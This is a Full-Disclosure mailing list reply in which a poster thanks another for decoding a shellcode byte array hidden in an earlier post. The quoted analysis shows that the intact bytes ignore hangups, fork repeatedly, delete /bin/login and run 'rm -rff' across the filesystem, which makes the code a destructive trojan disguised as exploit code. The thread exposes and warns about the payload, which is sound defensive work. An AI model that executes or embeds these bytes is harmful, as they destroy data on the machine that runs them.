
Date: Wed, 02 Jan 2008 14:40:11 +0200
From: Nikolay Kichukov <hijacker@...um.net>
To: Andrew Farmer <andfarm@...il.com>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: here

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Thanks Andrew! Nice catch! ;-)

Cheers,
- -Nikolay

Andrew Farmer wrote:
> On 20 Dec 07, at 18:51, onion ring wrote:
> <snip>
>> char sc[] =
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80"
>>  "\xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80"
>>  "\x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42"
>>  "\xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31"
>>  "\xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F"
>>  "\x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F"
>>  "\x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72"
>>  "\x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2"
>>  "\x04\x0B\xCD\x80";
> <snip>
> 
> Abbreviated disassembly:
>    signal(SIGHUP, SIG_IGN)
>    something that looks like a 15-level deep fork() bomb
>    something involving kill()
>    unlink("/bin/login")
>    execve("//bin/rm", {"//bin/rm", "-rff", "*///"})
> 
> You could at least try to obfuscate your constants a little better.  
> That was way too easy.
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBR3uGKzFLYVOGGjgXAQLqzwgAo4UyRGOIGKt2rHK32x17Imt5axyJIHQF
+sIq8NsJzw5U5psM63MrxIkKajW2c/THOUIbFR4TaFAt1/ng3covsJHh1iX6bpfN
uD18QTY3FHPIv9LNXoYgtJmLiUBFqY1AWXd5ih1e/LMRa9ZP8KVjv14EnmJom8tP
qL/WEtYjq60reaLpLpowhVLi4q1KKjvC4BoRz7zGmp26As6ah/5HmYpjpsiA7cKg
v7959l4bQsy0QHG6YP+pY8PfQX3KmhFns1yAsQF93TMGx3N8LYa1fdcXkZLrw5nf
L8tI3QZ+Qhu4lck+QzElCtD3sUuB4z/ae+KsJWWJuGoDe7CdrR5Yug==
=bBbH
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
